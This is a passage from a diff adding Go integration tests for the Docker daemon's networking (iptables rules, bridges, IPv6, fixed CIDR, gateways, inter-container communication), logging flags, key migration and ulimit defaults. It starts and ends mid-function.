{ + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + + if strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output should not have contained %q, but was %q", ipTablesSearchString, out) + } +} + +func (s *DockerDaemonSuite) TestDaemonIptablesCreate(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + if out, err := s.d.Cmd("run", "-d", "--name", "top", "--restart=always", "-p", "80", "busybox:latest", "top"); err != nil { + c.Fatalf("Could not run top: %s, %v", out, err) + } + + // get output from iptables with container running + ipTablesSearchString := "tcp dpt:80" + ipTablesCmd := exec.Command("iptables", "-nvL") + out, _, err := runCommandWithOutput(ipTablesCmd) + if err != nil { + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + + if !strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out) + } + + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + + // make sure the container is not running + runningOut, err := s.d.Cmd("inspect", "--format={{.State.Running}}", "top") + if err != nil { + c.Fatalf("Could not inspect on container: %s, %v", out, err) + } + if strings.TrimSpace(runningOut) != "true" { + c.Fatalf("Container should have been restarted after daemon restart. 
Status running should have been true but was: %q", strings.TrimSpace(runningOut)) + } + + // get output from iptables after restart + ipTablesCmd = exec.Command("iptables", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + if err != nil { + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + + if !strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output after restart should have contained %q, but was %q", ipTablesSearchString, out) + } +} + +// TestDaemonIPv6Enabled checks that when the daemon is started with --ipv6=true that the docker0 bridge +// has the fe80::1 address and that a container is assigned a link-local address +func (s *DockerDaemonSuite) TestDaemonIPv6Enabled(c *check.C) { + testRequires(c, IPv6) + + setupV6(c) + defer teardownV6(c) + + if err := s.d.StartWithBusybox("--ipv6"); err != nil { + c.Fatal(err) + } + + iface, err := net.InterfaceByName("docker0") + if err != nil { + c.Fatalf("Error getting docker0 interface: %v", err) + } + + addrs, err := iface.Addrs() + if err != nil { + c.Fatalf("Error getting addresses for docker0 interface: %v", err) + } + + var found bool + expected := "fe80::1/64" + + for i := range addrs { + if addrs[i].String() == expected { + found = true + break + } + } + + if !found { + c.Fatalf("Bridge does not have an IPv6 Address") + } + + if out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "busybox:latest"); err != nil { + c.Fatalf("Could not run container: %s, %v", out, err) + } + + out, err := s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.Networks.bridge.LinkLocalIPv6Address}}'", "ipv6test") + out = strings.Trim(out, " \r\n'") + + if err != nil { + c.Fatalf("Error inspecting container: %s, %v", out, err) + } + + if ip := net.ParseIP(out); ip == nil { + c.Fatalf("Container should have a link-local IPv6 address") + } + + out, err = s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.Networks.bridge.GlobalIPv6Address}}'", "ipv6test") + out = strings.Trim(out, " \r\n'") + + 
if err != nil { + c.Fatalf("Error inspecting container: %s, %v", out, err) + } + + if ip := net.ParseIP(out); ip != nil { + c.Fatalf("Container should not have a global IPv6 address: %v", out) + } +} + +// TestDaemonIPv6FixedCIDR checks that when the daemon is started with --ipv6=true and a fixed CIDR +// that running containers are given a link-local and global IPv6 address +func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDR(c *check.C) { + // IPv6 setup is messing with local bridge address. + testRequires(c, SameHostDaemon) + setupV6(c) + defer teardownV6(c) + + err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:2::/64", "--default-gateway-v6=2001:db8:2::100") + c.Assert(err, checker.IsNil, check.Commentf("Could not start daemon with busybox: %v", err)) + + out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf("Could not run container: %s, %v", out, err)) + + out, err = s.d.Cmd("inspect", "--format", "{{.NetworkSettings.Networks.bridge.GlobalIPv6Address}}", "ipv6test") + out = strings.Trim(out, " \r\n'") + + c.Assert(err, checker.IsNil, check.Commentf(out)) + + ip := net.ParseIP(out) + c.Assert(ip, checker.NotNil, check.Commentf("Container should have a global IPv6 address")) + + out, err = s.d.Cmd("inspect", "--format", "{{.NetworkSettings.Networks.bridge.IPv6Gateway}}", "ipv6test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + c.Assert(strings.Trim(out, " \r\n'"), checker.Equals, "2001:db8:2::100", check.Commentf("Container should have a global IPv6 gateway")) +} + +// TestDaemonIPv6FixedCIDRAndMac checks that when the daemon is started with ipv6 fixed CIDR +// the running containers are given an IPv6 address derived from the MAC address and the ipv6 fixed CIDR +func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDRAndMac(c *check.C) { + // IPv6 setup is messing with local bridge address. 
+ testRequires(c, SameHostDaemon) + setupV6(c) + defer teardownV6(c) + + err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:1::/64") + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "--mac-address", "AA:BB:CC:DD:EE:FF", "busybox") + c.Assert(err, checker.IsNil) + + out, err = s.d.Cmd("inspect", "--format", "{{.NetworkSettings.Networks.bridge.GlobalIPv6Address}}", "ipv6test") + c.Assert(err, checker.IsNil) + c.Assert(strings.Trim(out, " \r\n'"), checker.Equals, "2001:db8:1::aabb:ccdd:eeff") +} + +func (s *DockerDaemonSuite) TestDaemonLogLevelWrong(c *check.C) { + c.Assert(s.d.Start("--log-level=bogus"), check.NotNil, check.Commentf("Daemon shouldn't start with wrong log level")) +} + +func (s *DockerDaemonSuite) TestDaemonLogLevelDebug(c *check.C) { + if err := s.d.Start("--log-level=debug"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if !strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Missing level="debug" in log file:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonLogLevelFatal(c *check.C) { + // we creating new daemons to create new logFile + if err := s.d.Start("--log-level=fatal"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Should not have level="debug" in log file:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonFlagD(c *check.C) { + if err := s.d.Start("-D"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if !strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Should have level="debug" in log file using -D:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonFlagDebug(c *check.C) { + if err := s.d.Start("--debug"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if 
!strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Should have level="debug" in log file using --debug:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonFlagDebugLogLevelFatal(c *check.C) { + if err := s.d.Start("--debug", "--log-level=fatal"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if !strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Should have level="debug" in log file when using both --debug and --log-level=fatal:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonAllocatesListeningPort(c *check.C) { + listeningPorts := [][]string{ + {"0.0.0.0", "0.0.0.0", "5678"}, + {"127.0.0.1", "127.0.0.1", "1234"}, + {"localhost", "127.0.0.1", "1235"}, + } + + cmdArgs := make([]string, 0, len(listeningPorts)*2) + for _, hostDirective := range listeningPorts { + cmdArgs = append(cmdArgs, "--host", fmt.Sprintf("tcp://%s:%s", hostDirective[0], hostDirective[2])) + } + + if err := s.d.StartWithBusybox(cmdArgs...); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + for _, hostDirective := range listeningPorts { + output, err := s.d.Cmd("run", "-p", fmt.Sprintf("%s:%s:80", hostDirective[1], hostDirective[2]), "busybox", "true") + if err == nil { + c.Fatalf("Container should not start, expected port already allocated error: %q", output) + } else if !strings.Contains(output, "port is already allocated") { + c.Fatalf("Expected port is already allocated error: %q", output) + } + } +} + +func (s *DockerDaemonSuite) TestDaemonKeyGeneration(c *check.C) { + // TODO: skip or update for Windows daemon + os.Remove("/etc/docker/key.json") + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + s.d.Stop() + + k, err := libtrust.LoadKeyFile("/etc/docker/key.json") + if err != nil { + c.Fatalf("Error opening key file") + } + kid := k.KeyID() + // Test Key ID is a valid fingerprint (e.g. 
QQXN:JY5W:TBXI:MK3X:GX6P:PD5D:F56N:NHCS:LVRZ:JA46:R24J:XEFF) + if len(kid) != 59 { + c.Fatalf("Bad key ID: %s", kid) + } +} + +func (s *DockerDaemonSuite) TestDaemonKeyMigration(c *check.C) { + // TODO: skip or update for Windows daemon + os.Remove("/etc/docker/key.json") + k1, err := libtrust.GenerateECP256PrivateKey() + if err != nil { + c.Fatalf("Error generating private key: %s", err) + } + if err := os.MkdirAll(filepath.Join(os.Getenv("HOME"), ".docker"), 0755); err != nil { + c.Fatalf("Error creating .docker directory: %s", err) + } + if err := libtrust.SaveKey(filepath.Join(os.Getenv("HOME"), ".docker", "key.json"), k1); err != nil { + c.Fatalf("Error saving private key: %s", err) + } + + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + s.d.Stop() + + k2, err := libtrust.LoadKeyFile("/etc/docker/key.json") + if err != nil { + c.Fatalf("Error opening key file") + } + if k1.KeyID() != k2.KeyID() { + c.Fatalf("Key not migrated") + } +} + +// GH#11320 - verify that the daemon exits on failure properly +// Note that this explicitly tests the conflict of {-b,--bridge} and {--bip} options as the means +// to get a daemon init failure; no other tests for -b/--bip conflict are therefore required +func (s *DockerDaemonSuite) TestDaemonExitOnFailure(c *check.C) { + //attempt to start daemon with incorrect flags (we know -b and --bip conflict) + if err := s.d.Start("--bridge", "nosuchbridge", "--bip", "1.1.1.1"); err != nil { + //verify we got the right error + if !strings.Contains(err.Error(), "Daemon exited") { + c.Fatalf("Expected daemon not to start, got %v", err) + } + // look in the log and make sure we got the message that daemon is shutting down + runCmd := exec.Command("grep", "Error starting daemon", s.d.LogFileName()) + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("Expected 'Error starting daemon' message; but doesn't exist in log: %q, err: %v", out, err) + } + } else { + //if we didn't get an 
error and the daemon is running, this is a failure + c.Fatal("Conflicting options should cause the daemon to error out with a failure") + } +} + +func (s *DockerDaemonSuite) TestDaemonBridgeExternal(c *check.C) { + d := s.d + err := d.Start("--bridge", "nosuchbridge") + c.Assert(err, check.NotNil, check.Commentf("--bridge option with an invalid bridge should cause the daemon to fail")) + defer d.Restart() + + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + _, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = d.StartWithBusybox("--bridge", bridgeName) + c.Assert(err, check.IsNil) + + ipTablesSearchString := bridgeIPNet.String() + ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", + ipTablesSearchString, out)) + + _, err = d.Cmd("run", "-d", "--name", "ExtContainer", "busybox", "top") + c.Assert(err, check.IsNil) + + containerIP := d.findContainerIP("ExtContainer") + ip := net.ParseIP(containerIP) + c.Assert(bridgeIPNet.Contains(ip), check.Equals, true, + check.Commentf("Container IP-Address must be in the same subnet range : %s", + containerIP)) +} + +func (s *DockerDaemonSuite) TestDaemonBridgeNone(c *check.C) { + // start with bridge none + d := s.d + err := d.StartWithBusybox("--bridge", "none") + c.Assert(err, check.IsNil) + defer d.Restart() + + // verify docker0 iface is not there + out, _, err := runCommandWithOutput(exec.Command("ifconfig", "docker0")) + c.Assert(err, check.NotNil, check.Commentf("docker0 should not be present if daemon started with --bridge=none")) + c.Assert(strings.Contains(out, "Device not found"), check.Equals, true) + + // 
verify default "bridge" network is not there + out, err = d.Cmd("network", "inspect", "bridge") + c.Assert(err, check.NotNil, check.Commentf("\"bridge\" network should not be present if daemon started with --bridge=none")) + c.Assert(strings.Contains(out, "No such network"), check.Equals, true) +} + +func createInterface(c *check.C, ifType string, ifName string, ipNet string) (string, error) { + args := []string{"link", "add", "name", ifName, "type", ifType} + ipLinkCmd := exec.Command("ip", args...) + out, _, err := runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + + ifCfgCmd := exec.Command("ifconfig", ifName, ipNet, "up") + out, _, err = runCommandWithOutput(ifCfgCmd) + return out, err +} + +func deleteInterface(c *check.C, ifName string) { + ifCmd := exec.Command("ip", "link", "delete", ifName) + out, _, err := runCommandWithOutput(ifCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + + flushCmd := exec.Command("iptables", "-t", "nat", "--flush") + out, _, err = runCommandWithOutput(flushCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + + flushCmd = exec.Command("iptables", "--flush") + out, _, err = runCommandWithOutput(flushCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) { + // TestDaemonBridgeIP Steps + // 1. Delete the existing docker0 Bridge + // 2. Set --bip daemon configuration and start the new Docker Daemon + // 3. Check if the bip config has taken effect using ifconfig and iptables commands + // 4. Launch a Container and make sure the IP-Address is in the expected subnet + // 5. Delete the docker0 Bridge + // 6. 
Restart the Docker Daemon (via deferred action) + // This Restart takes care of bringing docker0 interface back to auto-assigned IP + + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + d := s.d + + bridgeIP := "192.169.1.1/24" + ip, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) + + err := d.StartWithBusybox("--bip", bridgeIP) + c.Assert(err, check.IsNil) + defer d.Restart() + + ifconfigSearchString := ip.String() + ifconfigCmd := exec.Command("ifconfig", defaultNetworkBridge) + out, _, _, err := runCommandWithStdoutStderr(ifconfigCmd) + c.Assert(err, check.IsNil) + + c.Assert(strings.Contains(out, ifconfigSearchString), check.Equals, true, + check.Commentf("ifconfig output should have contained %q, but was %q", + ifconfigSearchString, out)) + + ipTablesSearchString := bridgeIPNet.String() + ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", + ipTablesSearchString, out)) + + out, err = d.Cmd("run", "-d", "--name", "test", "busybox", "top") + c.Assert(err, check.IsNil) + + containerIP := d.findContainerIP("test") + ip = net.ParseIP(containerIP) + c.Assert(bridgeIPNet.Contains(ip), check.Equals, true, + check.Commentf("Container IP-Address must be in the same subnet range : %s", + containerIP)) + deleteInterface(c, defaultNetworkBridge) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithBridgeIPChange(c *check.C) { + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + defer s.d.Restart() + if err := s.d.Stop(); err != nil { + c.Fatalf("Could not stop daemon: %v", err) + } + + // now we will change the docker0's IP and then try starting the daemon + bridgeIP := "192.169.100.1/24" + _, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) + + ipCmd := exec.Command("ifconfig", 
"docker0", bridgeIP) + stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd) + if err != nil { + c.Fatalf("failed to change docker0's IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr) + } + + if err := s.d.Start("--bip", bridgeIP); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + + //check if the iptables contains new bridgeIP MASQUERADE rule + ipTablesSearchString := bridgeIPNet.String() + ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") + out, _, err := runCommandWithOutput(ipTablesCmd) + if err != nil { + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + if !strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output should have contained new MASQUERADE rule with IP %q, but was %q", ipTablesSearchString, out) + } +} + +func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr(c *check.C) { + d := s.d + + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + args := []string{"--bridge", bridgeName, "--fixed-cidr", "192.169.1.0/30"} + err = d.StartWithBusybox(args...) 
+ c.Assert(err, check.IsNil) + defer d.Restart() + + for i := 0; i < 4; i++ { + cName := "Container" + strconv.Itoa(i) + out, err := d.Cmd("run", "-d", "--name", cName, "busybox", "top") + if err != nil { + c.Assert(strings.Contains(out, "no available IPv4 addresses"), check.Equals, true, + check.Commentf("Could not run a Container : %s %s", err.Error(), out)) + } + } +} + +func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr2(c *check.C) { + d := s.d + + bridgeName := "external-bridge" + bridgeIP := "10.2.2.1/16" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = d.StartWithBusybox("--bip", bridgeIP, "--fixed-cidr", "10.2.2.0/24") + c.Assert(err, check.IsNil) + defer s.d.Restart() + + out, err = d.Cmd("run", "-d", "--name", "bb", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + defer d.Cmd("stop", "bb") + + out, err = d.Cmd("exec", "bb", "/bin/sh", "-c", "ifconfig eth0 | awk '/inet addr/{print substr($2,6)}'") + c.Assert(out, checker.Equals, "10.2.2.0\n") + + out, err = d.Cmd("run", "--rm", "busybox", "/bin/sh", "-c", "ifconfig eth0 | awk '/inet addr/{print substr($2,6)}'") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Equals, "10.2.2.2\n") +} + +func (s *DockerDaemonSuite) TestDaemonBridgeFixedCIDREqualBridgeNetwork(c *check.C) { + d := s.d + + bridgeName := "external-bridge" + bridgeIP := "172.27.42.1/16" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = d.StartWithBusybox("--bridge", bridgeName, "--fixed-cidr", bridgeIP) + c.Assert(err, check.IsNil) + defer s.d.Restart() + + out, err = d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + cid1 := strings.TrimSpace(out) + defer d.Cmd("stop", cid1) +} + +func (s *DockerDaemonSuite) 
TestDaemonDefaultGatewayIPv4Implicit(c *check.C) { + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + d := s.d + + bridgeIP := "192.169.1.1" + bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP) + + err := d.StartWithBusybox("--bip", bridgeIPNet) + c.Assert(err, check.IsNil) + defer d.Restart() + + expectedMessage := fmt.Sprintf("default via %s dev", bridgeIP) + out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0") + c.Assert(strings.Contains(out, expectedMessage), check.Equals, true, + check.Commentf("Implicit default gateway should be bridge IP %s, but default route was '%s'", + bridgeIP, strings.TrimSpace(out))) + deleteInterface(c, defaultNetworkBridge) +} + +func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Explicit(c *check.C) { + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + d := s.d + + bridgeIP := "192.169.1.1" + bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP) + gatewayIP := "192.169.1.254" + + err := d.StartWithBusybox("--bip", bridgeIPNet, "--default-gateway", gatewayIP) + c.Assert(err, check.IsNil) + defer d.Restart() + + expectedMessage := fmt.Sprintf("default via %s dev", gatewayIP) + out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0") + c.Assert(strings.Contains(out, expectedMessage), check.Equals, true, + check.Commentf("Explicit default gateway should be %s, but default route was '%s'", + gatewayIP, strings.TrimSpace(out))) + deleteInterface(c, defaultNetworkBridge) +} + +func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4ExplicitOutsideContainerSubnet(c *check.C) { + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + // Program a custom default gateway outside of the container subnet, daemon should accept it and start + err := s.d.StartWithBusybox("--bip", "172.16.0.10/16", "--fixed-cidr", "172.16.1.0/24", "--default-gateway", "172.16.0.254") + c.Assert(err, check.IsNil) + + deleteInterface(c, 
defaultNetworkBridge) + s.d.Restart() +} + +func (s *DockerDaemonSuite) TestDaemonDefaultNetworkInvalidClusterConfig(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + // Start daemon without docker0 bridge + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + discoveryBackend := "consul://consuladdr:consulport/some/path" + err := s.d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend)) + c.Assert(err, checker.IsNil) + + // Start daemon with docker0 bridge + result := icmd.RunCommand("ifconfig", defaultNetworkBridge) + c.Assert(result, icmd.Matches, icmd.Success) + + err = s.d.Restart(fmt.Sprintf("--cluster-store=%s", discoveryBackend)) + c.Assert(err, checker.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) { + d := s.d + + ipStr := "192.170.1.1/24" + ip, _, _ := net.ParseCIDR(ipStr) + args := []string{"--ip", ip.String()} + err := d.StartWithBusybox(args...) + c.Assert(err, check.IsNil) + defer d.Restart() + + out, err := d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top") + c.Assert(err, check.NotNil, + check.Commentf("Running a container must fail with an invalid --ip option")) + c.Assert(strings.Contains(out, "Error starting userland proxy"), check.Equals, true) + + ifName := "dummy" + out, err = createInterface(c, "dummy", ifName, ipStr) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, ifName) + + _, err = d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top") + c.Assert(err, check.IsNil) + + ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + regex := fmt.Sprintf("DNAT.*%s.*dpt:8000", ip.String()) + matched, _ := regexp.MatchString(regex, out) + c.Assert(matched, check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", regex, out)) +} + +func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) { + testRequires(c, bridgeNfIptables) + 
d := s.d + + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + args := []string{"--bridge", bridgeName, "--icc=false"} + err = d.StartWithBusybox(args...) + c.Assert(err, check.IsNil) + defer d.Restart() + + ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName) + matched, _ := regexp.MatchString(regex, out) + c.Assert(matched, check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", regex, out)) + + // Pinging another container must fail with --icc=false + pingContainers(c, d, true) + + ipStr := "192.171.1.1/24" + ip, _, _ := net.ParseCIDR(ipStr) + ifName := "icc-dummy" + + createInterface(c, "dummy", ifName, ipStr) + + // But, Pinging external or a Host interface must succeed + pingCmd := fmt.Sprintf("ping -c 1 %s -W 1", ip.String()) + runArgs := []string{"run", "--rm", "busybox", "sh", "-c", pingCmd} + _, err = d.Cmd(runArgs...) + c.Assert(err, check.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonICCLinkExpose(c *check.C) { + d := s.d + + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + args := []string{"--bridge", bridgeName, "--icc=false"} + err = d.StartWithBusybox(args...) 
+ c.Assert(err, check.IsNil) + defer d.Restart() + + ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName) + matched, _ := regexp.MatchString(regex, out) + c.Assert(matched, check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", regex, out)) + + out, err = d.Cmd("run", "-d", "--expose", "4567", "--name", "icc1", "busybox", "nc", "-l", "-p", "4567") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = d.Cmd("run", "--link", "icc1:icc1", "busybox", "nc", "icc1", "4567") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestDaemonLinksIpTablesRulesWhenLinkAndUnlink(c *check.C) { + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = s.d.StartWithBusybox("--bridge", bridgeName, "--icc=false") + c.Assert(err, check.IsNil) + defer s.d.Restart() + + _, err = s.d.Cmd("run", "-d", "--name", "child", "--publish", "8080:80", "busybox", "top") + c.Assert(err, check.IsNil) + _, err = s.d.Cmd("run", "-d", "--name", "parent", "--link", "child:http", "busybox", "top") + c.Assert(err, check.IsNil) + + childIP := s.d.findContainerIP("child") + parentIP := s.d.findContainerIP("parent") + + sourceRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", childIP, "--sport", "80", "-d", parentIP, "-j", "ACCEPT"} + destinationRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", parentIP, "--dport", "80", "-d", childIP, "-j", "ACCEPT"} + if !iptables.Exists("filter", "DOCKER", sourceRule...) || !iptables.Exists("filter", "DOCKER", destinationRule...) 
{ + c.Fatal("Iptables rules not found") + } + + s.d.Cmd("rm", "--link", "parent/http") + if iptables.Exists("filter", "DOCKER", sourceRule...) || iptables.Exists("filter", "DOCKER", destinationRule...) { + c.Fatal("Iptables rules should be removed when unlink") + } + + s.d.Cmd("kill", "child") + s.d.Cmd("kill", "parent") +} + +func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) { + testRequires(c, DaemonIsLinux) + + if err := s.d.StartWithBusybox("--default-ulimit", "nofile=42:42", "--default-ulimit", "nproc=1024:1024"); err != nil { + c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--ulimit", "nproc=2048", "--name=test", "busybox", "/bin/sh", "-c", "echo $(ulimit -n); echo $(ulimit -p)") + if err != nil { + c.Fatal(out, err) + } + + outArr := strings.Split(out, "\n") + if len(outArr) < 2 { + c.Fatalf("got unexpected output: %s", out) + } + nofile := strings.TrimSpace(outArr[0]) + nproc := strings.TrimSpace(outArr[1]) + + if nofile != "42" { + c.Fatalf("expected `ulimit -n` to be `42`, got: %s", nofile) + } + if nproc != "2048" { + c.Fatalf("expected `ulimit -p` to be 2048, got: %s", nproc) + } + + // Now restart daemon with a new default + if err := s.d.Restart("--default-ulimit", "nofile=43"); err != nil { + c.Fatal(err) + } + + out, err = s.d.Cmd("start", "-a", "test") + if err != nil { + c.Fatal(err) + } + + outArr = strings.Split(out, "\n") + if len(outArr) < 2 { + c.Fatalf("got unexpected output: %s", out) + } + nofile = strings.TrimSpace(outArr[0]) + nproc = strings.TrimSpace(outArr[1]) + + if nofile != "43" { + c.Fatalf("expected `ulimit -n` to be `43`, got: %s", nofile) + } + if nproc != "2048" { + c.Fatalf("expected `ulimit -p` to be 2048, got: %s", nproc) + } +} + +// #11315 +func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + + if out, err := s.d.Cmd("run", "--name=test", "busybox"); err != nil { + c.Fatal(err, out) + } + + if out, err := 
s.d.Cmd("rename", "test", "test2"); err != nil { + c.Fatal(err, out) + } + + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + if out, err := s.d.Cmd("start", "test2"); err != nil { + c.Fatal(err, out) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefault(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") + c.Assert(err, check.IsNil, check.Commentf(out)) + id, err := s.d.getIDByName("test") + c.Assert(err, check.IsNil) + + logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + + if _, err := os.Stat(logPath); err != nil { + c.Fatal(err) + } + f, err := os.Open(logPath) + if err != nil { + c.Fatal(err) + } + defer f.Close() + + var res struct { + Log string `json:"log"` + Stream string `json:"stream"` + Time time.Time `json:"time"` + } + if err := json.NewDecoder(f).Decode(&res); err != nil { + c.Fatal(err) + } + if res.Log != "testline\n" { + c.Fatalf("Unexpected log line: %q, expected: %q", res.Log, "testline\n") + } + if res.Stream != "stdout" { + c.Fatalf("Unexpected stream: %q, expected: %q", res.Stream, "stdout") + } + if !time.Now().After(res.Time) { + c.Fatalf("Log time 